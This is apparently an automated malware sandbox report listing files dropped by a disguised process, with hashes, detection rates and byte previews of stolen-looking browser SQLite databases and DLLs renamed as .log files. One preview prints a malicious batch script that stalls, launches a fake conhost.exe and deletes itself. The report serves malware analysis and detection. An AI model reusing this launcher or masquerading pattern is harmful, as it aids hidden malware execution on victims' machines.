                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\8bSUpEPMb2

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):98304
                              Entropy (8bit):0.08235737944063153
                              Encrypted:false
                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\BRVjWuqk3e

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.6732424250451717
                              Encrypted:false
                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\MxuOpwHgrS

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.121297215059106
                              Encrypted:false
                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                              MD5:D87270D0039ED3A5A72E7082EA71E305
                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                              Malicious:false
                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\QYrJfb0Uf8

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.5712781801655107
                              Encrypted:false
                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                              MD5:05A60B4620923FD5D53B9204391452AF
                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\RES9C21.tmp

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c4, 10 symbols, created Sun Aug 25 14:44:38 2024, 1st section name ".debug$S"
                              Category:dropped
                              Size (bytes):1916
                              Entropy (8bit):4.587617185240102
                              Encrypted:false
                              SSDEEP:24:HzLe9s6LzvDxuHyFwKRNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+qcN:6Lz7wTKRslmuulB+hnqXSfbNtmhP
                              MD5:2BE51398921B96CC1D537E479D71FD7E
                              SHA1:A95244DEC6943AC78B8F7E22C96D9B6C1810F716
                              SHA-256:A6BA9CE2B4556BAC0D92D823C3503287920E36D40D59C75BD5D4394EA5D9DBC3
                              SHA-512:769BDFA106A484AA534A437C08E7D316B7047F910EC35D3A10652B09FFC3FBCF8F64DF996264C06606EBACB9F760051E189E8626014DBF2F06F18C2314B66434
                              Malicious:false
                              Preview:L...VC.f.............debug$S........L...................@..B.rsrc$01................x...........@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES9C21.tmp.-.<....................a..Microsoft (R) CVTRES.S.=..cwd.C:\FontHost.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.

                              C:\Users\user\AppData\Local\Temp\RES9E35.tmp

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Sun Aug 25 14:44:39 2024, 1st section name ".debug$S"
                              Category:dropped
                              Size (bytes):1944
                              Entropy (8bit):4.540351927603488
                              Encrypted:false
                              SSDEEP:24:HIC9TOSfPuHvwKRNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:oSfGYKREluOulajfqXSfbNtmhBZ
                              MD5:050911BBA31CD6446D538B3090C2C160
                              SHA1:6936EA63CB17D72671C78DB20A818EA2100C2517
                              SHA-256:54F896FF73CEFB8200C2E857D96CEADD96375B2FA8BEF520C0F17E3E67CBAC04
                              SHA-512:AAF1EF85010F91D6C95A3A32CAA4B5A1A02C6387B553C0FB5745B794E435903F3F80BF5DBFDD141BC40BAA3DC9041C48C14846C43FCF6EFEAB222EFFF5800359
                              Malicious:false
                              Preview:L...WC.f.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........=....c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES9E35.tmp.-.<....................a..Microsoft (R) CVTRES.S.=..cwd.C:\FontHost.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.

                              C:\Users\user\AppData\Local\Temp\TZCclynNgp

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                              Category:dropped
                              Size (bytes):40960
                              Entropy (8bit):0.8553638852307782
                              Encrypted:false
                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                              MD5:28222628A3465C5F0D4B28F70F97F482
                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\Tugyd8Ydfg

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):25
                              Entropy (8bit):4.213660689688185
                              Encrypted:false
                              SSDEEP:3:teB2dOd:q
                              MD5:C2CF16931E12C5B355C6B6E45E48433A
                              SHA1:2F3373509D50AE4D2D1AC72C76669EBF7A2725D4
                              SHA-256:AD2B01A1DD9B0F65EBBA6B2D4B5F843BAC40481DAFCA3B99C00521615A6D35B1
                              SHA-512:C7D15E56E48BB43C733AF9B5B25564F0FD077A314BE63AC7335D1A2C48C1B38B158DE7DA6AD7629C073F7876BB7B00232AE4AE86B5C8356EFA565A8F684DB406
                              Malicious:false
                              Preview:XNF1PKBI33K6RDSB0yrBHzk1a

                              C:\Users\user\AppData\Local\Temp\XddgcIjwdZ

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.5707520969659783
                              Encrypted:false
                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                              Malicious:false
                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\aBpv6yHFBi

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                              Category:dropped
                              Size (bytes):51200
                              Entropy (8bit):0.8746135976761988
                              Encrypted:false
                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):211
                              Entropy (8bit):5.041032002581369
                              Encrypted:false
                              SSDEEP:6:hCijTg3Nou1SV+DE1IDzKOZG1923fn8/kh:HTg9uYDE80/q
                              MD5:294EFEE643FE51EBDAE8EF743238C920
                              SHA1:603B31298F8E8DC179487E7733AD720FA7F37943
                              SHA-256:DFEA0554D271FBCA0EEE6EAECB0C318BDE486B5FB4627A3E1683D1556D1E3455
                              SHA-512:DCB3A57D6ED64F93255637341F54D6F9FAB26EBFB99E55BB8A9509A5F84196E0677CC2548579941CFF371449D84AB5C274F0BA0A590A12F3AA91DB08AF093E5B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\All Users\dbg\conhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\aQ1wx53V7n.bat"

                              C:\Users\user\AppData\Local\Temp\d88VQi3hj3

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.5707520969659783
                              Encrypted:false
                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                              Malicious:false
                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\eMv1osaJMV

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.121297215059106
                              Encrypted:false
                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                              MD5:D87270D0039ED3A5A72E7082EA71E305
                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                              Malicious:false
                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\g1xwJn77k7

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):106496
                              Entropy (8bit):1.136413900497188
                              Encrypted:false
                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                              MD5:429F49156428FD53EB06FC82088FD324
                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                              Malicious:false
                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\rXoD4iCVCH

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):25
                              Entropy (8bit):4.133660689688185
                              Encrypted:false
                              SSDEEP:3:dVwwt97E4DHn:daOH
                              MD5:7339575A9A4751FDA40538F2321C479F
                              SHA1:54919F84C7F97A8DF30EBF6FD2C0A766739F4A13
                              SHA-256:8222C5C6EB4643EBA42A14077A4A82207FC4CD7E9D6ED3B19B17555BDDD5FB4B
                              SHA-512:F77D7B8BB0BF2F1737986DCD1E6B5D29D39BB4D000701B7E101AEBBEF3A3A9900EE29133B7317935199AB3A6491927208FADFA16C9D7C889CE950B6CEBEE1449
                              Malicious:false
                              Preview:uKMYpMvKXaUsyfHXawa2NRqfb

                              C:\Users\user\Desktop\EeOHqUfQ.log

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):33792
                              Entropy (8bit):5.541771649974822
                              Encrypted:false
                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 29%
                              • Antivirus: Virustotal, Detection: 27%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                              C:\Users\user\Desktop\EmyZUDGW.log

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):32256
                              Entropy (8bit):5.631194486392901
                              Encrypted:false
                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 25%
                              • Antivirus: Virustotal, Detection: 29%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                              C:\Users\user\Desktop\GeIICmFp.log

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):85504
                              Entropy (8bit):5.8769270258874755
                              Encrypted:false
                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                              MD5:E9CE850DB4350471A62CC24ACB83E859
                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 71%
                              • Antivirus: Virustotal, Detection: 69%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                              C:\Users\user\Desktop\LtUgLbtj.log

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):32256
                              Entropy (8bit):5.631194486392901
                              Encrypted:false
                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 25%
                              • Antivirus: Virustotal, Detection: 29%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                              C:\Users\user\Desktop\ONhXawky.log

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):69632
                              Entropy (8bit):5.932541123129161
                              Encrypted:false
                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 17%
                              • Antivirus: Virustotal, Detection: 22%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                              C:\Users\user\Desktop\XwBnJZqg.log

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):85504
                              Entropy (8bit):5.8769270258874755
                              Encrypted:false
                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                              MD5:E9CE850DB4350471A62CC24ACB83E859
                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 71%
                              • Antivirus: Virustotal, Detection: 69%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                              C:\Users\user\Desktop\ddCMyFqs.log

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):23552
                              Entropy (8bit):5.519109060441589
                              Encrypted:false
                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
